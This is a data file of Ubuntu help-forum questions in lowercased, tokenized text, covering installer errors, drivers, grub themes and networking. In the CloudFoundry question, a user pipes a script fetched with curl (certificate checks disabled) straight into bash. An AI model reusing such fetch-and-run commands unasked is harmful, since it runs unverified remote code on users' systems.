337037	photos tab on ubuntu one is empty	the text you do not have any folders containing photos shows up and i can not see any photos . yet , i have shared photos from my pictures folder on my computer . i even created a photos folder to which i 've added and shared one photos . they all show fine in the files tab on ubuntu one , but not in the photos tab . what am i doing wrong ?
337038	recipecloudfoundry chef compile error in cloudfoundry/vcap/dev_setup/cookbooks/cloud_controller/attributes/default.rb	i 've just installed cloudfoundry server paas on ubuntu 11.10 following this step-by-step guide . how do i install the same on ubuntu 12.04 ? i have tried to install cloudfoundry v2 on ubuntu 12.04 using vagrant , but that version is not perfectly installed yet . many service like mysql , redis etc not included yet . then i trid to install cloudfoundry with chef , but i got error like bellow : recipe compile error in /home/user1/cloudfoundry/vcap/dev_setup/cookbooks/cloud_controller/attributes/default.rb bellow full log message : $ bash < < ( curl -s -k -b https : //raw.github.com/cloudfoundry/vcap/master/dev_setup/bin/vcap_dev_setup ) installing wget ... reading package lists ... building dependency tree ... reading state information ... ... ... [ 2013-08-27t14:31:42+00:00 ] info : starting chef run for paas.dc31001b77fa4c5a8aa4b0724d0fd095.openpaas.2767201159.asiaeast.internal.cloudapp.net [ 2013-08-27t14:31:42+00:00 ] info : running start handlers [ 2013-08-27t14:31:42+00:00 ] info : start handlers complete . compiling cookbooks ... ================================================================================ recipe compile error in /home/user1/cloudfoundry/vcap/dev_setup/cookbooks/cloud_controller/attributes/default.rb ================================================================================ nomethoderror -- -- -- -- -- -- - undefined node attribute or method `include_recipe ' on `node' cookbook trace : -- -- -- -- -- -- -- - /home/user1/cloudfoundry/vcap/dev_setup/cookbooks/cloud_controller/attributes/default.rb:1 : in `from_file' relevant file content : -- -- -- -- -- -- -- -- -- -- -- /home/user1/cloudfoundry/vcap/dev_setup/cookbooks/cloud_controller/attributes/default.rb : 1 > > include_recipe `` deployment '' 2 : include_attribute `` postgresql '' 3 : include_attribute `` redis '' 4 : include_attributes `` uaa '' 5 : include_attributes `` service_lifecycle '' 6 : 7 : default [ : deployment ] [ : welcome ] = `` vmware 's cloud application platform '' 8 : 9 : default [ : cloud_controller ] [ : config_file ] = `` cloud_controller.yml '' 10 : default [ : cloud_controller ] [ : service_api_uri ] = `` http : //api. # { node [ : deployment ] [ : domain ] } '' [ 2013-08-27t14:31:42+00:00 ] error : running exception handlers [ 2013-08-27t14:31:42+00:00 ] error : exception handlers complete [ 2013-08-27t14:31:42+00:00 ] fatal : stacktrace dumped to /var/chef/cache/chef-stacktrace.out chef client failed . 0 resources updated [ 2013-08-27t14:31:42+00:00 ] fatal : chef : :exceptions : :childconvergeerror : chef run process exited unsuccessfully ( exit code 1 ) user1 @ paas : ~ $ uname -a linux paas 3.2.0-39-virtual # 62-ubuntu smp thu feb 28 00:48:27 utc 2013 x86_64 x86_64 x86_64 gnu/linux user1 @ paas : ~ $ nano /home/user1/cloudfoundry/vcap/dev_setup/cookbooks/cloud_controller/attributes/default.rb
337040	weird wireless connection issue	i am currently having a weird internet connection problem . i am running ubuntu 12.04 on a dual boot using gnome classic interface and using a wireless usb adapter . the issue i am having is that my internet connection keeps dropping and then 5 seconds later , it reconnects and only stays connected for 10 to 15 seconds , before dropping again . i have tried checking the additional drivers but it does not list my usb adapter but drivers for my nvidia geforce 640 graphics card . i checked in terminal and my system does list the adapter but there is no gui for it . the adapter is the medialink wireless-n usb adapter ( model # mwn-usb150n ) . i checked medialink 's website and they do have a linux driver but after downloading it and reading the instructions it was way too technical and beyond my skills to try to install it since i am new to linux . i have spent hours reading forums and trying the desktop help to try to solve this . if anyone could help it would be greatly appreciated . lz @ lz-ms-7845 : ~ $ sudo lsmod [ sudo ] password for lz : module size used by bnep 17830 2 rfcomm 38139 0 bluetooth 158447 10 bnep , rfcomm parport_pc 32114 0 ppdev 12849 0 arc4 12473 2 rt2800usb 22373 0 snd_hda_codec_hdmi 31775 1 rt2800lib 53298 1 rt2800usb crc_ccitt 12627 1 rt2800lib snd_hda_codec_realtek 174313 1 rt2x00usb 20099 1 rt2800usb rt2x00lib 48875 3 rt2800usb , rt2800lib , rt2x00usb snd_hda_intel 32719 5 mac80211 436493 3 rt2800lib , rt2x00usb , rt2x00lib snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel nvidia 8502822 39 cfg80211 178877 2 rt2x00lib , mac80211 snd_hwdep 13276 1 snd_hda_codec snd_seq_midi 13132 0 snd_pcm 80916 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq mxm_wmi 12893 0 snd 62218 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mac_hid 13077 0 soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm serio_raw 13027 0 video 19115 0 wmi 18744 1 mxm_wmi lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41937 0 hid 77428 1 usbhid dmesg command : [ 181.798032 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 181.798033 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 181.798035 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 181.798036 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 181.798037 ] xhci_hcd 0000:00:14.0 : error no room on ep ring and continues on and on with same error . lsusb command : lz @ lz-ms-7845 : ~ $ sudo lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 002 device 002 : id 8087:8000 intel corp . bus 003 device 002 : id 093a:2510 pixart imaging , inc. optical mouse bus 003 device 003 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter
337041	having error : brokencount > 0	i was installing pidginfacebookchat-1.69.deb package from a 3rd party `` https : //code.google.com/p/pidgin-facebookchat/ '' but after installing it from the ubuntu software center , an error appeared items can not be installed or removed until package catalog is removed even after pressing repair the same error keeps appearing . sudo apt-get check shows *you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : pidgin-data : breaks : pidgin-facebookchat ( < 1.69-2 ) but 1.69 is installed e : unmet dependencies . try using -f*. < /pre > sudo apt-get -f install is showing : *dpkg : warning : there 's no installed package matching pidgin-facebookchat : amd64* can somebody please help ?
337049	how can i install a synaptics pointing driver ?	i 'm using ubuntu 13.04 , the latest version available from the ubuntu website when i 'm using windows 8 , the touch pad works well with the installed synaptics pointing driver , handling all features like horizontal , vertical scroll as well as circle scrolling etc . but the problem is , in ubuntu i only get vertical scrolling . can anyone tell me how to install synaptics pointing driver for all such functions ?
337051	dash shortcut has insufficient privileges ?	i followed this guide to install utorrent and to install a dash shortcut for utorrent : tutorial the method for shortcut creation uses gnome-item-edit and the command i enter for the shortcut is : utserver -settingspath ~/applications/utorrent-server-v3_0/ & when i enter this command in a terminal everything works well , however , when i click the created icon , and visit my web interface , it displays the following error : the âľtorrent webui does not seem to be installed . click here to try to install it , or see the guide for more details . this leads me to think there is something wrong with my privileges . the permissions for all files in the directory look like : -r-xr-xrwx 1 nino nino 877468 apr 18 2012 utserver
337054	adb can not see my tablet ( pipo s1 )	i am unable to access my tablet ( pipo s1 ) through adb - after running adb devices , there are no devices visible . usb debugging is enabled , and i have tried 2 different usb ports and cables . i was able to find the vendor id through lsusb , which is 2207 . i added this id to /etc/udev/rules.d/70-android.rules , 51-android.rules and 99-android.rules , after reading different conflicting information online . the exact line i added was : subsystem== '' usb '' , sysfs { idvendor } == '' 2207 '' , mode= '' 0666 '' , group= '' adbusers '' even after multiple server restarts , unplugging and re-plugging the device , i am still unable to see it . any ideas ? my end goal is to root this tablet without resorting to windows based apps .
337058	i ca n't download anything from ubuntu software center	i 've installed ubuntu 13.04 a few day 's ago and u.s.c . ( ubuntu software center ) worked perfect . yesterday i could n't download any more , the proggress tab show the number 1 and it is enabling component of the distribution with 1 item waiting : updating cache ( i 'm dutch and 12 years old so i do n't know much about computers )
337059	can not setup mysql	i was trying to setup mysql with this command sudo apt-get install mysql-server now i am getting this error start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... no apport report written because the error message indicates its a followup error from a previous failure . ldconfig deferred processing now taking place errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please help me to install mysql
337067	i can not get the screens optimal resolution ( 1920*1080 ) on ubuntu 12.04 with xfx radeon hd 7850 card	as the title indicates i have this problem . i recently bought a new graphics card ( xfx ati radeon hd 7850 ) . i have this monitor : samsung s22b150 21.5 inch widescreen led monitor gloss black ( 1920 x 1080 full hd , 5ms , vga ) up until now , with an amd a4-3400 apu with radeon hd 6410d on board graphics card , i was able to have an 1920*1080 screen resolution , as i have in my windows 7 os that i do n't use that much . i am using an dvi to vga adaptor on the graphics card end point , only to connect the graphics card with the monitor , since my monitor does not have an hdmi input . i have installed the latest driver + catalyst center for ubuntu and the biggest resolution that i can choose is the hefty 1600 x 1200 which somewhat distorts the image , which becomes really tiring as i am using my ubuntu os most of the time . can someone help me out with this ? ps : any additional info that one may need should he choose to help me out with this , will be happily supplied .
337071	how does the dash home index work in ubuntu 12.04	i think the dash home is really cool and here 's something i wan na learn about : when i type shortcut , it can prompt keyboard like this snapshot . i wan na know how ubuntu determines shortcut is related to keyboard ? what if i want to get chrome when i type www ?
337074	switcheroo gone after last update	since the last kernel update for ubuntu 13.04 , the folder /sys/kernel/debug/vgaswitcheroo/switch is gone on my laptop , an acer aspire 3820tg . checking the output of grep -i /boot/config-* tells me that my kernel supports switcheroo however , the file is gone ( and yes , i checked that as root ) . can anybody please give me a hint ? i almost checked the whole internet for an appropriate answer but nobody seems to have the same problem .
337075	how can i expose icmp ports in a hook ?	i 've got one question regarding ubuntu juju deployment , on aws cloud . i 'm using bash to write my hooks . at the end of the install hook/script , i have lines that expose some of my tcp ports ( 80,443,5666 etc ) syntax : open-port 80/tcp open-port 443/tcp my question is how can i expose icmp ports in a similar manner ? icmp echo request , icmp echo reply is what i need . the reason for this is that we use nagios for monitoring of our ec2 instances . alarms fire off right away , complaining that instance is not reachable , since nagios relies on icmp for basic remote host check .
337078	why ca n't i browse internet while downloading torrent or updates ?	i 've recently switched from windows to ubuntu since i was windows 7 made my laptop very slow . i thought updating ubuntu before i start using it properly would be the best option , but when i start updating , i can not browse the internet anymore . the same happens when i 'm downloading a torrent or installing an application from ubuntu s software center . is there any way to fix this ? i experienced same issue in linux mint 15 as well . have n't had this issue in windows though . can somebody help me understand why it happens in linux ?
337079	what are these files in my flash drive ?	these files are on my usb flash drive . i ca n't view them with dolphin , but i can view them in the terminal . i tried to copy them , but i failed ? virus ? is it ok to format the usb flash drive completely if i can ?
337086	compiling on ubuntu server	is it possible to compile on on ubuntu server using vim and g++ ? and possibly uploading those files onto your ubuntu desktop using ubuntu one ? i have an old mac laptop i want to use for my programming only , it is pretty old so i would rather run a cmd on it rather than an entire os . or if anyone has other suggestions that would be great as well , this is just a mobile lap top that i carry with me and would be great if i can upload all the work on it to my main machine .
337090	mousepad `` lock when hit ''	all right , i do n't know how to say this , but i will try my best ! when i used windows 7 , i could touch my mousepad and `` emulate '' a left-click , but when i do this in ubuntu , the mousepad temporarily locks , so the mouse would n't move . so now , i am looking to be able to do the same thing in ubuntu , but i ca n't seem to find it : ( i think what did was the synaptics driver , so maybe its impossible , just wanted to try the luck with the largest linux community ^^ edit : okay , maybe i did n't explain it well enough : p i am looking for a function which makes the mouse stay still when i tap on the mousepad , because the way it is now , i have the mouse over the desired button , but when i tap the mousepad , the mouse moves slightly , which can be a problem : p
337093	how to run parallel make with debuild ?	i am trying to make a package of a piece of software that i 've ( co- ) written . i 'm using debuild -i -us -uc -b and in principle that works fine . in order to shorten compilation time i 'd like to debuild to run make in parallel ( like i normally do by running make -j4 , for example ) . i 've found a few locations on the web that suggest the following : debuild -edeb_build_options= '' parallel=4 '' -us -uc -b debuild -j4 -us -uc -b another site suggested to add some code to the debian/rules file that basically sets makeflags += -j4 however , none of these seems to work . have i missed something ? or should i change something in the autoconf/automake settings of the source ?
337094	apt-add-repository raises an error	iâm trying to install jde ( java development environment ) , but apt-get fails with the following error : me @ ubuntu : ~/ $ sudo add-apt-repository ppa : webupd8team/java you are about to add the following ppa to your system : oracle java ( jdk ) installer ( automatically downloads and installs oracle jdk6 / jdk7 / jdk8 ) . there are no actual java files in this ppa . more info : http : //www.webupd8.org/2012/01/install-oracle-java-jdk-7-in-ubuntu-via.html debian installation instructions : http : //www.webupd8.org/2012/06/how-to-install-oracle-java-7-in-debian.html more info : https : //launchpad.net/~webupd8team/+archive/java press [ enter ] to continue or ctrl-c to cancel adding it exception in thread thread-1 : traceback ( most recent call last ) : file `` /usr/lib/python2.7/threading.py '' , line 551 , in __bootstrap_inner self.run ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 99 , in run self.add_ppa_signing_key ( self.ppa_path ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 132 , in add_ppa_signing_key tmp_keyring_dir = tempfile.mkdtemp ( ) file `` /usr/lib/python2.7/tempfile.py '' , line 322 , in mkdtemp name = names.next ( ) file `` /usr/lib/python2.7/tempfile.py '' , line 141 , in next letters = [ choose ( c ) for dummy in `` 123456 '' ] file `` /usr/lib/python2.7/random.py '' , line 274 , in choice return seq [ int ( self.random ( ) * len ( seq ) ) ] # raises indexerror if seq is empty valueerror : can not convert float nan to integer so , please can someone tell me , what can i do ? ( sorry for my bad english , i hope you understand )
337100	problems with backup/restore compiz settings	the problem i am having is that some of my compiz settings are lost after a reboot . i am using 13.04 and unity . the problem is with the focus-follows-mouse , auto-raise and auto-raise-delay setting . after a reboot my system forgets about ffm and reverts it back to default click on focus . i exported a working compiz config from another machine ( where it works fine ) and wanted to import the settings file to the system with the bug but in the compiz backup config there is no ffm setting included and compiz enables the default values . so how could i solve this issue ? before i do a bug report i wanted to ask here for help if someone knows a work around this situation .
337104	thunderbird crashing	when i open web links in thunderbird , my client freezes up or crashes . is this a bug that i need to report or can i fix this somehow ?
337105	grub2 theme stops win8 menuentry from working . why ?	windows 8 menuentry works before i set a theme but not after . why does this happen and how can i fix it ? note : please let me know if i should provide any other information . worked prior to 13.04 this bootloader theme ( script and setup instructions ) for grub2 worked with win8 and ubuntu 11.04 to 12.10 without problem . with ubuntu 13.04 / 13.10 it still works ( visually ) but the win8 menuentry settings will not work after the theme.txt is set in /etc/default/grub . info obtained via bootinfoscript . ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > grub2 ( v1.97-1.98 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 6 for /boot/burg . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bkpbootx64.efi /efi/boot/bootx64.efi /efi/grub/grubx64.efi /efi/ubuntu/grubx64.efi /efi/ubuntu/shimx64.efi sda3 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu saucy salamander ( development branch ) boot files : /boot/grub/grub.cfg /etc/fstab sdb1 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 250,069,679 250,069,679 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 1,230,847 1,228,800 windows recovery environment ( windows ) /dev/sda2 1,230,848 1,640,447 409,600 efi system partition /dev/sda3 1,640,448 1,902,591 262,144 microsoft reserved partition ( windows ) /dev/sda4 1,902,592 187,144,779 185,242,188 data partition ( windows/linux ) /dev/sda5 187,146,240 188,315,647 1,169,408 swap partition ( linux ) /dev/sda6 188,315,648 250,068,991 61,753,344 data partition ( linux ) drive : sdb _____________________________________________________________________ disk /dev/sdb : 31.5 gb , 31486640128 bytes 255 heads , 63 sectors/track , 3828 cylinders , total 61497344 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 8,192 61,496,472 61,488,281 c w95 fat32 ( lba ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 1a5234c05234a305 ntfs windows re tools /dev/sda2 be36-a896 vfat system /dev/sda4 70c8115ec81123be ntfs windows /dev/sda5 c000eea6-7a85-49dd-a8a5-43c684e0d45e swap /dev/sda6 a52a4d8b-25f8-4532-9681-c337e3cd4076 ext4 /dev/sdb1 d20d-aa2d vfat midmind ================================ mount points : ================================= device mount_point type options /dev/sda2 /boot/efi vfat ( rw ) /dev/sda6 / ext4 ( rw , errors=remount-ro ) /dev/sdb1 /media/brandon/midmind3 vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks2 ) =========================== sda6/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint-efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 a52a4d8b-25f8-4532-9681-c337e3cd4076 else search -- no-floppy -- fs-uuid -- set=root a52a4d8b-25f8-4532-9681-c337e3cd4076 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=1920x1020 load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint-efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 a52a4d8b-25f8-4532-9681-c337e3cd4076 else search -- no-floppy -- fs-uuid -- set=root a52a4d8b-25f8-4532-9681-c337e3cd4076 fi insmod gfxmenu loadfont ( $ root ) /usr/share/grub/themes/mindo/ubuntu-thin-36.pf2 loadfont ( $ root ) /usr/share/grub/themes/mindo/ubuntu.pf2 insmod png set theme= ( $ root ) /usr/share/grub/themes/mindo/theme.txt export theme if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 0,0,0 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu 13.10 ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-a52a4d8b-25f8-4532-9681-c337e3cd4076 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint-efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 a52a4d8b-25f8-4532-9681-c337e3cd4076 else search -- no-floppy -- fs-uuid -- set=root a52a4d8b-25f8-4532-9681-c337e3cd4076 fi linux /boot/vmlinuz-3.11.0-rc7 root=uuid=a52a4d8b-25f8-4532-9681-c337e3cd4076 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.11.0-rc7 } submenu 'ubuntu repair ' -- class recovery -- class repair $ menuentry_id_option 'gnulinux-advanced-a52a4d8b-25f8-4532-9681-c337e3cd4076 ' { menuentry 'ubuntu , refresh 3.11.0-rc7 ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-rc7-advanced-a52a4d8b-25f8-4532-9681-c337e3cd4076 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint-efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 a52a4d8b-25f8-4532-9681-c337e3cd4076 else search -- no-floppy -- fs-uuid -- set=root a52a4d8b-25f8-4532-9681-c337e3cd4076 fi echo 'loading linux 3.11.0-rc7 ... ' linux /boot/vmlinuz-3.11.0-rc7 root=uuid=a52a4d8b-25f8-4532-9681-c337e3cd4076 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-rc7 } menuentry 'ubuntu , repair 3.11.0-rc7 ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-rc7-recovery-a52a4d8b-25f8-4532-9681-c337e3cd4076 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint-efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 a52a4d8b-25f8-4532-9681-c337e3cd4076 else search -- no-floppy -- fs-uuid -- set=root a52a4d8b-25f8-4532-9681-c337e3cd4076 fi echo 'loading linux 3.11.0-rc7 ... ' linux /boot/vmlinuz-3.11.0-rc7 root=uuid=a52a4d8b-25f8-4532-9681-c337e3cd4076 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-rc7 } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/25_custom # # # menuentry `` windows 8 ( a ) '' -- class windows { search -- fs-uuid -- no-floppy -- set=root be36-a896 chainloader ( $ { root } ) /efi/microsoft/boot/bootmgfw.efi } menuentry `` windows 8 ( b ) '' -- class windows { search -- fs-uuid -- no-floppy -- set=root be36-a896 chainloader ( $ { root } ) /efi/boot/bkpbootx64.efi } # # # end /etc/grub.d/25_custom # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows boot manager ( c ) '' -- class windows -- class os { insmod part_gpt insmod fat set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 be36-a896 else search -- no-floppy -- fs-uuid -- set=root be36-a896 fi chainloader /efi/microsoft/boot/bootmgfw.efi } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # menuentry `` secure boot '' -- class secure -- class recovery $ menuentry_id_option 'uefi-firmware ' { fwsetup } # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda6/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda6 during installation uuid=a52a4d8b-25f8-4532-9681-c337e3cd4076 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda2 during installation # uuid=be36-a896 /boot/efi vfat defaults 0 1 # swap was on /dev/sda5 during installation uuid=c000eea6-7a85-49dd-a8a5-43c684e0d45e none swap sw 0 0 uuid=be36-a896 /boot/efi vfat defaults 0 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
337106	install ubuntu on asus k55n ( uefi ) laptop	i recently bought an asus k55n-db81 laptop , which uses uefi . when i boot in uefi mode onto the installation disk and select `` install ubuntu '' , the computer outputs onto the screen `` binary whitelisted '' . also , when i boot using the `` legacy '' bios , it displays nothing and the disk turns off . i have posted a thread at ubuntuforums here thanks , andrew
337107	is there any image viewer with one-click rotation ?	i am searching for a simple image viewer , like shotwell or eye of gnome , but in this apps i need to save the image every time i rotate it . is there an image viewer , which will save the image automatically ? edit : i am looking for a gui app .
337110	how can i connect to internet using wifi on my dell inspiron 1545 running on ubuntu 12.04	i am using ubuntu 12.04 on my dell inspiron 1545 and i can successfully connect to the internet using an ethernet cable but not when i try and connect through the wifi . any help would be appreciated . my wireless card details : - broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 )
337115	tahoma persian yea problem	i 've tried to download and install tahoma font in my ubuntu 13.04 . everything works fine except there is a problem with two characters ی and ي ( d and shift+d in persian layout ) these are displayed incorrectly everywhere ( webpages , libreoffice , etc ) . wherever it should display ی , displays ي and vice-versa . my question is if i can swap these two in a font-editor application or something ?
337116	ubuntu opens in black screen using lightdm but working when using gdm	last time i installed lm-sensor ( a package to know cpu temperature ) and restarted my system . $ sudo apt-get install lm-sensors $ sudo sensors-detect $ sudo service module-init-tools start $ sensors since it did not work for me so i thought to restart my system . then omg ! it started opening in a black screen after 'ubuntu splash screen ' on every restart . sometime i got the message on top of the screen : could not write bytes : broken pipe non of keys were working except ctrl+alt+del which restarts the system . neither ctrl+alt+f1 to ctrl+alt+f10 keys were working so that i could go to command line interface . only option remaing was to restart my system in safe mode . i restarted my system in safe mode and installed gdm ( a display manager like lightdm ) and configured it : first change the read only mode to read/write mode by simple using fix broken packages options listed there and then loged in as root , then : # apt-get install gdm # dpkg-reconfigure lightdm then selected gdm from the list , and restarted my system . # reboot this time a login screen appeared successfully and i was able to login to my system . gdm display manager is good but i want to use lightdm since gdm does n't allow me to log in automatically although i tried to change automatically login option from 'all settings - > user accounts ' . please suggest me how can i fix this problem so that i can use lightdm . any help will be greatly appreciated .
